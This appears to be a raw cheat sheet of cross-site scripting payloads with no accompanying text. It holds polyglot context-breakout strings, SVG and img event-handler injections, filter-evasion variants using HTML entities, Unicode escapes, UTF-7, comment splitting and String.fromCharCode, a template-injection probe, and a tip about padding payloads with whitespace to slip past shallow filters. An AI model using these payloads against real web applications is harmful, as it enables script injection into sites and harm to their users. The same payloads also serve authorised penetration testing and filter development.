'"><img src=x>${{7*2}}
1//%0Aalert?.(/Hunted/)//'/*\'/*"/*\"/*`/*\`/*&apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*S4/*/;{/8/(alert)(/Hunted/)}//>
JavaScript://%250Aalert?.(/Hunted/)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/<Style/</Script/</textArea/</iFrame/<noScript>\74k<K/contentEditable/autofocus/OnFocus=/*${/*/;{/**/(alert)(/Hunted/)}//>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
<svg/onload=confirm`1`>
<svg/onload=\u0061lert(1)>
<img src=hhttttpp onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>
<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>
<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>click</a>
<svg onload=setTimeout`\u0061\u006c\u0065\u0072\u0074(1)`>
<svg/onload=confirm(1)>
<svg onload="throw 1">
<svg onload="confirm`${1}`">
<svg onload="confirm`XSS`">
<svg onload="throw'XSS'">
<svg onload="console.log`XSS executed`">
<svg/onload=\u0063onfirm(1)>
<svg onload=confirm`${1}`>

<scr<script>ipt>document.write("asdasd")</scr<script>ipt>
<SVG/ONLOAD=CON&#x46;IRM(1)>
<svg/onload=\u0063%6Fn%66%69%72%6D(1)>
+ADw-svg+AD4-onload=confirm(1)+ADw-/svg+AD4-       (UTF-7)
<svg/onload=con/*comment*/firm(1)>
<svg/onload=\u0063on&#x0A;firm(1)
<svg/onload=\u{63}\u{6F}\u{6E}\u{66}\u{69}\u{72}\u{6D}(1)>
<svg/onload=\u0063\u006F\u006E\u0066\u0069\u0072\u006D(1)>
<svg/onload=c+o+n+f+i+r+m(1)>
<svg/onload=\u0063+on+firm(1)>
<svg><animate onbegin=confirm(1) attributeName=x dur=1s></animate></svg>
<svg><xss onload=\u0063onfirm(1)></xss></svg>

*test start of payload with 10240 characters of whitespace to bypass shallow filters*

eval(String.fromCharCode(99, 111, 110, 102, 105, 114, 109, 40, 49, 41, 59)); 
');confirm();//
');eval(String.fromCharCode(99, 111, 110, 102, 105, 114, 109, 40, 49, 41, 59));//

